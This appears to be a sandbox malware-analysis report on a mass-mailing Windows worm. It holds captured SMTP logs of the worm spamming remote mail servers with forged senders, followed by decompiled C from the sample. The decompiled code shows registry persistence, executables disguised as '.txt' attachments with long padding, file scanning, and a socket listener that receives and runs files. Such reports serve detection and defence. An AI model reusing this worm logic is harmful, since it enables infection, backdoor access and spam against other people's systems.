Feb 20, 2023 09:52:13.574609041 CET	25	49784	51.81.61.70	192.168.2.5	550 5.7.1 Sender blocked error; [84.17.52.8] blocked using Abusix Policy List - https://lookup.abusix.com/search?q=[%!s(MISSING)] - ELNK001_107 - https://postmaster-earthlink.vadesecure.com/inbound_error_codes/#_107
Feb 20, 2023 09:52:13.850528955 CET	49785	25	192.168.2.5	185.132.181.97	DATA
Feb 20, 2023 09:52:13.875422001 CET	25	49785	185.132.181.97	192.168.2.5	354 Enter mail, end with "." on a line by itself
Feb 20, 2023 09:52:19.402124882 CET	25	49785	185.132.181.97	192.168.2.5	250 2.0.0 3ntmhygx70-1 Message accepted for delivery
Feb 20, 2023 09:52:19.404314995 CET	49785	25	192.168.2.5	185.132.181.97	QUIT
Feb 20, 2023 09:52:19.426052094 CET	25	49785	185.132.181.97	192.168.2.5	221 2.0.0 mx07-00377f01.pphosted.com Closing connection
Feb 20, 2023 09:52:20.039159060 CET	25	49786	131.111.8.146	192.168.2.5	220 ppsw-32.srv.uis.cam.ac.uk (mx.cam.ac.uk [131.111.8.146]:25) ESMTP Exim 4.96-0 Mon, 20 Feb 2023 08:52:20 +0000
Feb 20, 2023 09:52:20.283499956 CET	49786	25	192.168.2.5	131.111.8.146	EHLO cl.cam.ac.uk
Feb 20, 2023 09:52:20.645246029 CET	25	49787	64.29.151.236	192.168.2.5	220 mail157c40.carrierzone.com ESMTP Sendmail 8.14.9/8.13.1; Mon, 20 Feb 2023 03:52:18 -0500
Feb 20, 2023 09:52:20.920618057 CET	49787	25	192.168.2.5	64.29.151.236	EHLO theriver.com
Feb 20, 2023 09:52:20.973376989 CET	587	49704	208.91.199.225	192.168.2.5	421 4.4.2 us2.outbound.mailhostbox.com Error: timeout exceeded
Feb 20, 2023 09:52:21.107777119 CET	25	49787	64.29.151.236	192.168.2.5	250-mail157c40.carrierzone.com Hello unn-84-17-52-8.cdn77.com [84.17.52.8] (may be forged), pleased to meet you 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-SIZE 52428800 250-DSN 250-STARTTLS 250-DELIVERBY 250 HELP
Feb 20, 2023 09:52:21.115966082 CET	49787	25	192.168.2.5	64.29.151.236	MAIL FROM:<artes@contoso.mx>
Feb 20, 2023 09:52:21.268127918 CET	25	49787	64.29.151.236	192.168.2.5	553 5.1.8 <artes@contoso.mx>... Domain of sender address artes@contoso.mx does not exist
Feb 20, 2023 09:52:21.393188953 CET	25	49789	148.163.139.28	192.168.2.5	554 Blocked - see https://ipcheck.proofpoint.com/?ip=84.17.52.8
Feb 20, 2023 09:52:21.945971966 CET	25	49789	148.163.139.28	192.168.2.5	421 4.4.2 Connection read error
Feb 20, 2023 09:52:24.898000002 CET	25	49788	192.254.190.168	192.168.2.5	220-gator3194.hostgator.com ESMTP Exim 4.95 #2 Mon, 20 Feb 2023 02:52:24 -0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 20, 2023 09:52:25.047172070 CET	25	49791	153.127.71.68	192.168.2.5	220 c015.c015jp6701.info ESMTP Postfix
Feb 20, 2023 09:52:25.052886009 CET	49791	25	192.168.2.5	153.127.71.68	EHLO linuxnet.com
Feb 20, 2023 09:52:25.061578989 CET	49788	25	192.168.2.5	192.254.190.168	EHLO onlineconnections.com.au
Feb 20, 2023 09:52:25.231187105 CET	25	49788	192.254.190.168	192.168.2.5	250-gator3194.hostgator.com Hello onlineconnections.com.au [84.17.52.8] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 20, 2023 09:52:25.263453007 CET	25	49790	140.78.3.83	192.168.2.5	220 mail3.edvz.uni-linz.ac.at ESMTP
Feb 20, 2023 09:52:25.326761961 CET	25	49786	131.111.8.146	192.168.2.5	250-ppsw-32.srv.uis.cam.ac.uk Hello cl.cam.ac.uk [84.17.52.8] 250-SIZE 104857600 250-8BITMIME 250-VRFY 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Feb 20, 2023 09:52:25.342478037 CET	25	49791	153.127.71.68	192.168.2.5	250-c015.c015jp6701.info 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Feb 20, 2023 09:52:25.545869112 CET	49790	25	192.168.2.5	140.78.3.83	EHLO jk.uni-linz.ac.at
Feb 20, 2023 09:52:25.564479113 CET	49786	25	192.168.2.5	131.111.8.146	MAIL FROM:<john.smith@abc.org>
Feb 20, 2023 09:52:25.566091061 CET	49788	25	192.168.2.5	192.254.190.168	MAIL FROM:<grady@netcom.com>
Feb 20, 2023 09:52:25.566356897 CET	49791	25	192.168.2.5	153.127.71.68	MAIL FROM:<matt@litwareinc.com>
Feb 20, 2023 09:52:25.571037054 CET	25	49790	140.78.3.83	192.168.2.5	250-mail3.edvz.uni-linz.ac.at Hello unn-84-17-52-8.cdn77.com [84.17.52.8] (may be forged), pleased to meet you 250 ENHANCEDSTATUSCODES
Feb 20, 2023 09:52:25.588017941 CET	49790	25	192.168.2.5	140.78.3.83	MAIL FROM:<x_vrx@fanfary.pq>
Feb 20, 2023 09:52:25.612061024 CET	25	49790	140.78.3.83	192.168.2.5	550 5.7.1 Mail from 84.17.52.8 rejected using zen.spamhaus.org. Please see http://www.spamhaus.org/query/bl?ip=84.17.52.8
Feb 20, 2023 09:52:25.735553026 CET	25	49788	192.254.190.168	192.168.2.5	250 OK
Feb 20, 2023 09:52:25.857584953 CET	25	49791	153.127.71.68	192.168.2.5	250 2.1.0 Ok
Feb 20, 2023 09:52:25.947779894 CET	49788	25	192.168.2.5	192.254.190.168	RCPT TO:<audictionary@onlineconnections.com.au>
Feb 20, 2023 09:52:25.948069096 CET	49791	25	192.168.2.5	153.127.71.68	RCPT TO:<corcoran@linuxnet.com>
Feb 20, 2023 09:52:26.239079952 CET	25	49791	153.127.71.68	192.168.2.5	450 4.7.25 Client host rejected: cannot find your hostname, [84.17.52.8]
Feb 20, 2023 09:52:30.604484081 CET	25	49786	131.111.8.146	192.168.2.5	250 OK
Feb 20, 2023 09:52:31.214059114 CET	25	49788	192.254.190.168	192.168.2.5	550 No Such User Here"

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: .exePID: 5648, Parent PID: 3324

General

Target ID:	0
Start time:	09:50:23
Start date:	20/02/2023
Path:	C:\Users\user\Desktop\ .exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ .exe
Imagebase:	0x400000
File size:	22017 bytes
MD5 hash:	A3B23357F518A7B2F8180585D512DF94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Jammer2nd.exePID: 4740, Parent PID: 3324

General

Target ID:	1
Start time:	09:50:36
Start date:	20/02/2023
Path:	C:\Windows\Jammer2nd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Jammer2nd.exe"
Imagebase:	0x400000
File size:	22017 bytes
MD5 hash:	A3B23357F518A7B2F8180585D512DF94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: .exePID: 5648, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	32.5%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	12.8%
Total number of Nodes:	541
Total number of Limit Nodes:	9

Executed Functions

Function 00402DE3 Relevance: 52.6, APIs: 10, Strings: 20, Instructions: 143
threadsynchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00402DE3(void* __edx, void* __edi, void* __eflags) {
				long _v8;
				short _v18;
				short _v22;
				short _v24;
				long _v28;
				long _v32;
				char _v288;
				intOrPtr _t34;
				signed int _t50;
				signed int _t60;
				signed int _t62;
				void* _t63;
				void* _t77;

				_t77 = __eflags;
				_t63 = __edx;
				E00401BFF(GetTickCount());
				E0040320E(_t77, 1); // executed
				E00401C09();
				CreateMutexA(0, 0, "(S)(k)(y)(N)(e)(t)"); // executed
				if(GetLastError() == 0xb7) {
					return 0;
				}
				memset(0x56db90, 0, 0x16378 << 2);
				_push(0);
				_push(0x409f14);
				 *0x5c9984 = 0;
				E00401BAD( &_v288);
				_t34 = E00403658(E00403AA0(0x409f14));
				_t60 =  *0x5c9984; // 0x66
				 *((intOrPtr*)(0x40a410 + _t60 * 4)) = _t34;
				E004039B0(_t34,  &_v288);
				 *0x5c9984 =  *0x5c9984 + 1;
				E00402FC3(_t63, __eflags, "pk_zip1.log", 0x5c6970, "Details.txt                                                                                                                                     .exe"); // executed
				E00402FC3(_t63, __eflags, "pk_zip2.log", 0x5c6f4c, "Notice.txt                                                                                                                                     .exe"); // executed
				E00402FC3(_t63, __eflags, "pk_zip3.log", 0x5c7528, "Important.txt                                                                                                                                     .exe"); // executed
				E00402FC3(_t63, __eflags, "pk_zip4.log", 0x5c7b04, "Bill.txt                                                                                                                                     .exe"); // executed
				E00402FC3(_t63, __eflags, "pk_zip5.log", 0x5c80e0, "Data.txt                                                                                                                                     .exe"); // executed
				E00402FC3(_t63, __eflags, "pk_zip6.log", 0x5c86bc, "Part-2.txt                                                                                                                                     .exe"); // executed
				E00402FC3(_t63, __eflags, "pk_zip7.log", 0x5c8c98, "Textfile.txt                                                                                                                                     .exe"); // executed
				E00402FC3(_t63, __eflags, "pk_zip8.log", "C:\Windows\pk_zip8.log", "Informations.txt                                                                                                                                     .exe"); // executed
				CreateThread(0, 0, E0040221E, 0, 0,  &_v32); // executed
				CreateThread(0, 0, E00402CD3, 0, 0,  &_v28);
				_t8 =  &_v24; // 0x403f2d
				GetLocalTime(_t8);
				__eflags = _v18 - 1;
				if(_v18 > 1) {
					__eflags = _v18 - 6;
					if(_v18 < 6) {
						__eflags = _v22 - 5;
						if(_v22 == 5) {
							__eflags = _v24 - 0x7d4;
							if(_v24 == 0x7d4) {
								CreateThread(0, 0, E00403331, 0, 0,  &_v8);
							}
						}
					}
				}
				_v8 = 0x5c9988;
				do {
					CreateThread(0, 0, E00402268, 0, 0, _v8); // executed
					_t50 = E00401BE1();
					asm("cdq");
					_t62 = 0x21;
					Sleep(_t50 % _t62 + 0x457); // executed
					_v8 = _v8 + 4;
					__eflags = _v8 - 0x5c99a8;
				} while (_v8 < 0x5c99a8);
				L10:
				Sleep(0x19); // executed
				goto L10;
			}

0x00402de3
0x00402de3
0x00402df5
0x00402dfc
0x00402e03
0x00402e11
0x00402e22
0x00402e29
0x00402e29
0x00402e39
0x00402e40
0x00402e47
0x00402e49
0x00402e4f
0x00402e5b
0x00402e60
0x00402e66
0x00402e75
0x00402e7a
0x00402e8f
0x00402ea3
0x00402eb7
0x00402ece
0x00402ee2
0x00402ef6
0x00402f0a
0x00402f1e
0x00402f39
0x00402f48
0x00402f4a
0x00402f4e
0x00402f54
0x00402f59
0x00402f5b
0x00402f60
0x00402f62
0x00402f67
0x00402f69
0x00402f6f
0x00402f7e
0x00402f7e
0x00402f6f
0x00402f67
0x00402f60
0x00402f86
0x00402f8d
0x00402f99
0x00402f9b
0x00402fa2
0x00402fa3
0x00402fad
0x00402faf
0x00402fb3
0x00402fb3
0x00402fbd
0x00402fbf
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00402DEE

Part of subcall function 0040320E: GetModuleFileNameA.KERNEL32(00000000,?,000005DC,00000000), ref: 00403229
Part of subcall function 0040320E: GetWindowsDirectoryA.KERNEL32(?,000005DC), ref: 00403237
Part of subcall function 0040320E: CopyFileA.KERNEL32(?,?,00000000), ref: 004032A4
Part of subcall function 0040320E: RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 004032CF
Part of subcall function 0040320E: lstrcpy.KERNEL32(?,005C99A4), ref: 004032E1
Part of subcall function 0040320E: RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 0040331E
Part of subcall function 0040320E: RegCloseKey.ADVAPI32(?), ref: 00403327

Part of subcall function 00401C09: WSAStartup.WS2_32(00000101,00000000), ref: 00401C19

CreateMutexA.KERNELBASE(00000000,00000000,(S)(k)(y)(N)(e)(t)), ref: 00402E11
GetLastError.KERNEL32 ref: 00402E17
CreateThread.KERNELBASE(00000000,00000000,0040221E,00000000,00000000,?), ref: 00402F39
CreateThread.KERNELBASE(00000000,00000000,00402CD3,00000000,00000000,?), ref: 00402F48
GetLocalTime.KERNEL32(-?@), ref: 00402F4E
CreateThread.KERNEL32(00000000,00000000,00403331,00000000,00000000,?), ref: 00402F7E

Strings

Important.txt .exe, xrefs: 00402EA8
C:\Windows\pk_zip8.log, xrefs: 00402F14
Data.txt .exe, xrefs: 00402ED3
Bill.txt .exe, xrefs: 00402EBF
(S)(k)(y)(N)(e)(t), xrefs: 00402E0A
pk_zip8.log, xrefs: 00402F19
lkakbmheeezqnv@rkfww.uwa, xrefs: 00402E3B, 00402E47, 00402E54
pk_zip3.log, xrefs: 00402EB2
pk_zip6.log, xrefs: 00402EF1
Part-2.txt .exe, xrefs: 00402EE7
pk_zip2.log, xrefs: 00402E9E
pk_zip1.log, xrefs: 00402E8A
Textfile.txt .exe, xrefs: 00402EFB
-?@, xrefs: 00402F4A, 00402F4D
Informations.txt .exe, xrefs: 00402F0F
Notice.txt .exe, xrefs: 00402E94
Details.txt .exe, xrefs: 00402E80
pk_zip5.log, xrefs: 00402EDD
pk_zip7.log, xrefs: 00402F05
pk_zip4.log, xrefs: 00402EC9

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Create$Thread$File$CloseCopyCountDirectoryErrorLastLocalModuleMutexNameOpenStartupTickTimeValueWindowslstrcpy
String ID: (S)(k)(y)(N)(e)(t)$-?@$Bill.txt .exe$C:\Windows\pk_zip8.log$Data.txt .exe$Details.txt .exe$Important.txt .exe$Informations.txt .exe$Notice.txt .exe$Part-2.txt .exe$Textfile.txt .exe$lkakbmheeezqnv@rkfww.uwa$pk_zip1.log$pk_zip2.log$pk_zip3.log$pk_zip4.log$pk_zip5.log$pk_zip6.log$pk_zip7.log$pk_zip8.log
API String ID: 3068001702-3788280646
Opcode ID: a5145e7aa5c35fc8e85417fed5d63f8a8939ac72fa5d95d9750708e08f110fbc
Instruction ID: 4ebf85314fcd38872a8c31aa29b2b72bc780d1d99c976788d724c2de32313a05
Opcode Fuzzy Hash: a5145e7aa5c35fc8e85417fed5d63f8a8939ac72fa5d95d9750708e08f110fbc
Instruction Fuzzy Hash: 0B41BE31A852157AC710B7A29E0EEDF7E78AF51794B20407FF404721C2DAFC5A4496BE

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD3 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 94
networksleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 00402CE0
htons.WS2_32(00000299), ref: 00402D02
bind.WS2_32(00000000,00000002,00000010), ref: 00402D17
closesocket.WS2_32(00000000), ref: 00402D23
listen.WS2_32(00000000,00000005), ref: 00402D30
closesocket.WS2_32(00000000), ref: 00402D3C
accept.WS2_32(00000000,00000000,00000000), ref: 00402D59
wsprintfA.USER32 ref: 00402D76
_lopen.KERNEL32(?,00000001), ref: 00402D85
recv.WS2_32(?,?,00000010,00000000), ref: 00402D9E
_hwrite.KERNEL32(?,?,00000000), ref: 00402DAF
WinExec.KERNEL32(?,00000000), ref: 00402DBB
_lclose.KERNEL32(?), ref: 00402DC4
closesocket.WS2_32(?), ref: 00402DD0
Sleep.KERNEL32(00000019), ref: 00402DD8

Strings

%i.exe, xrefs: 00402D70

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: closesocket$ExecSleep_hwrite_lclose_lopenacceptbindhtonslistenrecvsocketwsprintf
String ID: %i.exe
API String ID: 3865184-2790168565
Opcode ID: 6659cccc17bd67e951b960eb86f6caf4be9dc3b57a67ac723e4f5e7f0d090007
Instruction ID: d7ffd6cc9b3c2abfbe271972a59fbc283245d41c526f19229cf5e1cf276d6dc5
Opcode Fuzzy Hash: 6659cccc17bd67e951b960eb86f6caf4be9dc3b57a67ac723e4f5e7f0d090007
Instruction Fuzzy Hash: 5B318F31C44218ABDB10ABB49D4DFDE7B78AF04320F104231F611FA2E0D7B869419BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402100 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402100(intOrPtr _a4) {
				char _v278;
				char _v279;
				struct _WIN32_FIND_DATAA _v324;
				char _v1824;
				void* _t29;
				long _t38;
				int _t43;
				int _t45;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;

				E004039B0( &_v1824, _a4);
				E004039C0( &_v1824, "\*.*");
				_t50 = _t49 + 0x10;
				_t29 = FindFirstFileA( &_v1824,  &_v324); // executed
				_t48 = _t29;
				if(_t48 != 0xffffffff && _t48 != 0) {
					do {
						if(_v279 != 0 || _v324.cFileName != 0x2e) {
							if(_v278 != 0 || _v324.cFileName != 0x2e || _v279 != 0x2e) {
								E004039B0( &_v1824, _a4);
								E004039C0( &_v1824, 0x409704);
								E004039C0( &_v1824,  &(_v324.cFileName));
								_t38 = E00403AA0( &_v1824);
								_t50 = _t50 + 0x1c;
								CharLowerBuffA( &_v1824, _t38); // executed
								_push( &_v1824);
								if((_v324.dwFileAttributes & 0x00000010) == 0) {
									E00401ED9(_t47, __eflags); // executed
								} else {
									E00402100(); // executed
								}
								_pop(_t47);
								if( *0x5c9984 > 0x58ddf) {
									break;
								} else {
									goto L11;
								}
							} else {
								goto L11;
							}
						}
						L11:
						_t45 = FindNextFileA(_t48,  &_v324); // executed
					} while (_t45 != 0);
					_t43 = FindClose(_t48); // executed
					return _t43;
				}
				return _t29;
			}

0x00402114
0x00402125
0x0040212a
0x0040213b
0x00402141
0x00402146
0x00402154
0x0040215b
0x00402171
0x0040218f
0x004021a0
0x004021b3
0x004021bf
0x004021c4
0x004021cf
0x004021e2
0x004021e3
0x004021ec
0x004021e5
0x004021e5
0x004021e5
0x004021fb
0x004021fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402171
0x004021fe
0x00402206
0x0040220c
0x00402215
0x00000000
0x00402215
0x0040221d

APIs

FindFirstFileA.KERNELBASE(?,?,?,?,?,00000018), ref: 0040213B
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000018), ref: 004021CF
FindNextFileA.KERNELBASE(00000000,00000010,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00402206
FindClose.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00402215

Part of subcall function 00401ED9: CharLowerBuffA.USER32(00000000,00000000,?,00000000,?,?,004021F1,?), ref: 00401F0A
Part of subcall function 00401ED9: _lopen.KERNEL32(004021F1,00000000), ref: 00401F56
Part of subcall function 00401ED9: _hread.KERNEL32(004021F1,?,00001000), ref: 00401F92
Part of subcall function 00401ED9: CharLowerBuffA.USER32(00000000,00000000), ref: 00401FB9

Strings

., xrefs: 00402173
\*.*, xrefs: 0040211F
., xrefs: 0040217C

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: BuffCharFindLower$File$CloseFirstNext_hread_lopen
String ID: .$.$\*.*
API String ID: 1164152165-3749113046
Opcode ID: 48fd18ff7e5fc3355ee32e209e8ae7f5becab93c3664e212135233a6b44c3be8
Instruction ID: 8b23b2746d589632d3be8dde7aac1a1cccb69490c7004b6962c552d8b6a0e5a2
Opcode Fuzzy Hash: 48fd18ff7e5fc3355ee32e209e8ae7f5becab93c3664e212135233a6b44c3be8
Instruction Fuzzy Hash: CD2132B1C4425CA6DB21AAE5CD49BDE776CAB04304F0401E7E608B11D2D7BC9B898F65

Uniqueness

Uniqueness Score: -1.00%

Function 00402797 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00402797(CHAR* _a4) {
				struct _SYSTEMTIME _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				struct _TIME_ZONE_INFORMATION _v268;
				long _t56;
				signed int _t70;
				signed int _t71;
				void* _t72;
				signed int _t76;
				signed int _t79;
				signed int _t80;
				void* _t82;
				signed int _t86;

				_v48 = 0x409860;
				_v44 = 0x40985c;
				_v40 = 0x409858;
				_v36 = 0x409854;
				_v32 = 0x409850;
				_v28 = 0x40984c;
				_v24 = 0x409848;
				_v96 = 0x409844;
				_v92 = 0x409840;
				_v88 = 0x40983c;
				_v84 = 0x409838;
				_v80 = 0x409834;
				_v76 = 0x409830;
				_v72 = 0x40982c;
				_v68 = 0x409828;
				_v64 = 0x409824;
				_v60 = 0x409820;
				_v56 = 0x40981c;
				_v52 = 0x409818;
				GetLocalTime( &_v20);
				_v268.Bias = _v268.Bias & 0x00000000;
				_t56 = GetTimeZoneInformation( &_v268); // executed
				_t70 = _v268.Bias;
				if(_t56 == 2) {
					_t70 = _t70 + _v268.DaylightBias;
					_t86 = _t70;
				}
				_t71 =  ~_t70;
				_t79 = _t71;
				if(_t86 < 0) {
					_t79 =  ~_t79;
				}
				if(_v20.wDayOfWeek > 6) {
					_v20.wDayOfWeek = 6;
				}
				if(_v20.wMonth == 0) {
					_v20.wMonth = 1;
				}
				if(_v20.wMonth > 0xc) {
					_v20.wMonth = 0xc;
				}
				_t72 = 0x409814;
				if(_t71 < 0) {
					_t72 = 0x409810;
				}
				asm("cdq");
				_t76 = 0x3c;
				_push(_t79 % _t76);
				asm("cdq");
				_t80 = _t76;
				_push(_t79 / _t80);
				_push(_t72);
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				_push( *((intOrPtr*)(_t82 + (_v20.wMonth & 0x0000ffff) * 4 - 0x60)));
				_push(_v20.wDay & 0x0000ffff);
				_push( *((intOrPtr*)(_t82 + (_v20.wDayOfWeek & 0x0000ffff) * 4 - 0x2c)));
				return wsprintfA(_a4, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u");
			}

0x004027a3
0x004027ab
0x004027b2
0x004027b9
0x004027c0
0x004027c7
0x004027ce
0x004027d5
0x004027dc
0x004027e3
0x004027ea
0x004027f1
0x004027f8
0x004027ff
0x00402806
0x0040280d
0x00402814
0x0040281b
0x00402822
0x00402829
0x0040282f
0x0040283d
0x00402843
0x0040284c
0x00402851
0x00402851
0x00402851
0x00402853
0x00402857
0x00402859
0x0040285b
0x0040285b
0x00402862
0x00402864
0x00402864
0x0040286f
0x00402871
0x00402871
0x0040287c
0x0040287e
0x0040287e
0x00402886
0x0040288b
0x0040288d
0x0040288d
0x00402896
0x00402897
0x0040289c
0x0040289e
0x0040289f
0x004028a2
0x004028a3
0x004028a8
0x004028ad
0x004028b2
0x004028b7
0x004028bc
0x004028c4
0x004028c9
0x004028e1

APIs

GetLocalTime.KERNEL32(?), ref: 00402829
GetTimeZoneInformation.KERNELBASE(00000000), ref: 0040283D
wsprintfA.USER32 ref: 004028D5

Strings

%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u, xrefs: 004028CD

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Time$InformationLocalZonewsprintf
String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
API String ID: 1715792076-4076198852
Opcode ID: 03615642989ab49e746200174b760a642c4149f4a84eb88f3231e94f98b65342
Instruction ID: c5f5af5ffa965d1a631dbaef240f4e8e46182637e787b53d8c41d86709929cc4
Opcode Fuzzy Hash: 03615642989ab49e746200174b760a642c4149f4a84eb88f3231e94f98b65342
Instruction Fuzzy Hash: 8A311076D10218AACF10AF85D9485EEBBB8EF46314F00D06AE554B63D1D3B84D89CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403E5F Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t26;
				intOrPtr _t28;
				signed int _t34;
				unsigned int _t44;
				intOrPtr _t50;

				_t45 = __edi;
				_push(0xffffffff);
				_push(0x4075b8);
				_push(E00404AAC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_push(__esi);
				_push(__edi);
				_v28 = _t50 - 0x58;
				_t15 = GetVersion();
				_t44 = _t15;
				 *0x5c99cc = 0;
				_t34 = _t15 & 0x000000ff;
				 *0x5c99c8 = _t34;
				 *0x5c99c4 = _t34 << 8;
				 *0x5c99c0 = _t15 >> 0x10;
				if(E00404977(0) == 0) {
					E00403F7A(0x1c);
				}
				_v8 = 0;
				E004047CC();
				 *0x5c9ed8 = GetCommandLineA();
				 *0x5c99a8 = E0040469A();
				E0040444D();
				E00404394();
				E004040B6();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E0040433C();
				_t53 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t26 = 0xa;
				} else {
					_t26 = _v96.wShowWindow & 0x0000ffff;
				}
				_t28 = E00402DE3(_t44, _t45, _t53, GetModuleHandleA(0), 0, _v104, _t26); // executed
				_v100 = _t28;
				E004040E3(_t28);
				_t30 = _v24;
				_t39 =  *((intOrPtr*)( *_v24));
				_v108 =  *((intOrPtr*)( *_v24));
				return E004041B8(0, _t53, _t39, _t30);
			}

0x00403e5f
0x00403e62
0x00403e64
0x00403e69
0x00403e74
0x00403e75
0x00403e80
0x00403e81
0x00403e82
0x00403e85
0x00403e8d
0x00403e8f
0x00403e97
0x00403e9d
0x00403ea8
0x00403eb1
0x00403ec1
0x00403ec5
0x00403eca
0x00403ecb
0x00403ece
0x00403ed9
0x00403ee3
0x00403ee8
0x00403eed
0x00403ef2
0x00403ef7
0x00403efe
0x00403f09
0x00403f0c
0x00403f10
0x00403f1a
0x00403f12
0x00403f12
0x00403f12
0x00403f28
0x00403f2d
0x00403f31
0x00403f36
0x00403f3b
0x00403f3d
0x00403f49

APIs

GetVersion.KERNEL32 ref: 00403E85

Part of subcall function 00404977: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403EBE,00000000), ref: 00404988
Part of subcall function 00404977: HeapDestroy.KERNEL32 ref: 004049A6

